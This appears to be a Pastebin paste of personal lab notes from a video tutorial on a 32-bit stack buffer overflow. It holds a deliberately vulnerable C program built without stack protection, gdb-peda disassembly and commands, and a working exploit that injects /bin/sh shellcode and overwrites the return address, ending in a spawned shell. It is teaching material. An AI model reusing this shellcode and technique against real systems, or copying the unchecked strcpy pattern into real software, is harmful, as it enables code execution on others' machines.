Combreal

bufferOverflowPixisTut

Aug 6th, 2020
230
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.96 KB | None | 0 0
  1. #BOF pixis tut
  2. https://www.youtube.com/watch?v=V7Gdc32XRhA
  3.  
  4. #include <stdio.h>
  5. #include <stdlib.h>
  6. #include <string.h>
  7.  
  8. void func(char *arg)
  9. {
  10.     char buffer[32];
  11.     strcpy(buffer,arg);
  12.     printf("%s\n", buffer);
  13. }
  14.  
  15. int main(int argc, char *argv[])
  16. {
  17.     if(argc != 2) printf("binary \n");
  18.     else func(argv[1]);
  19.     return 0;
  20. }
  21.  
  22. gcc -m32 -fno-stack-protector -z execstack test.c -w -g -o test
  23. peda test
  24. r $(perl -e 'print "A"x100')
  25. --> seg fault
  26. disass main
  27. 0x08048471 <+0>:     push   ebp
  28.    0x08048472 <+1>:     mov    ebp,esp
  29.    0x08048474 <+3>:     and    esp,0xfffffff0
  30.    0x08048477 <+6>:     sub    esp,0x10
  31.    0x0804847a <+9>:     cmp    DWORD PTR [ebp+0x8],0x2
  32.    0x0804847e <+13>:    je     0x804848e <main+29>
  33.    0x08048480 <+15>:    mov    DWORD PTR [esp],0x8048540
  34.    0x08048487 <+22>:    call   0x8048330 <puts@plt>
  35.    0x0804848c <+27>:    jmp    0x804849e <main+45>
  36.    0x0804848e <+29>:    mov    eax,DWORD PTR [ebp+0xc]
  37.    0x08048491 <+32>:    add    eax,0x4
  38.    0x08048494 <+35>:    mov    eax,DWORD PTR [eax]
  39.    0x08048496 <+37>:    mov    DWORD PTR [esp],eax
  40.    0x08048499 <+40>:    call   0x804844c <func>
  41.    0x0804849e <+45>:    mov    eax,0x0
  42.    0x080484a3 <+50>:    leave
  43.    0x080484a4 <+51>:    ret
  44. disass func
  45. 0x0804844c <+0>:     push   ebp
  46.    0x0804844d <+1>:     mov    ebp,esp
  47.    0x0804844f <+3>:     sub    esp,0x38
  48.    0x08048452 <+6>:     mov    eax,DWORD PTR [ebp+0x8]
  49.    0x08048455 <+9>:     mov    DWORD PTR [esp+0x4],eax
  50.    0x08048459 <+13>:    lea    eax,[ebp-0x28]
  51.    0x0804845c <+16>:    mov    DWORD PTR [esp],eax
  52. => 0x0804845f <+19>:    call   0x8048320 <strcpy@plt>
  53.    0x08048464 <+24>:    lea    eax,[ebp-0x28]
  54.    0x08048467 <+27>:    mov    DWORD PTR [esp],eax
  55.    0x0804846a <+30>:    call   0x8048330 <puts@plt>
  56.    0x0804846f <+35>:    leave
  57.    0x08048470 <+36>:    ret
  58. b *0x0804844c #break 1ère ligne func
  59. b *0x0804845f #strcpy dans func
  60. r $(perl -e 'print "A"x100')
  61. x/xw $esp
  62.    0xbffffbec:     0x0804849e #0x0804849e est l'@ de retour qui deviendra $eip
  63. x/4i 0x0804849e
  64.    0x804849e <main+45>: mov    eax,0x0
  65.    0x80484a3 <main+50>: leave
  66.    0x80484a4 <main+51>: ret  #on retrouve cela dans disass main
  67.    0x80484a5:   nop  
  68. c
  69. dumpargs
  70.    arg[0]: 0xbffffbc0 --> 0x0
  71.    arg[1]: 0xbffffdd9 ('A' <repeats 100 times>)
  72. p/d  0xbffffbec-0xbffffbc0 #@ debut buffer - @sauvegarde EIP
  73. r $(perl -e 'print "A"x44 . "ABCD"')
  74. c
  75. c
  76.    Stopped reason: SIGSEGV
  77.    0x44434241 in ?? () #control du flux d'execution (1234)
  78. r $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x90"x(44-23) . "ABCD"')
  79. c
  80. c
  81.    Stopped reason: SIGSEGV
  82.    0x44434241 in ?? () #control du flux d'execution (1234)
  83. r $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x90"x(44-23) . "\xf0\xfb\xff\xbf"') #0xbffffbf0 @ où est stockée le contenu du buffer
  84. c
  85. c
  86. process 11897 is executing new program: /bin/dash
  87.  
Add Comment
Please, Sign In to add comment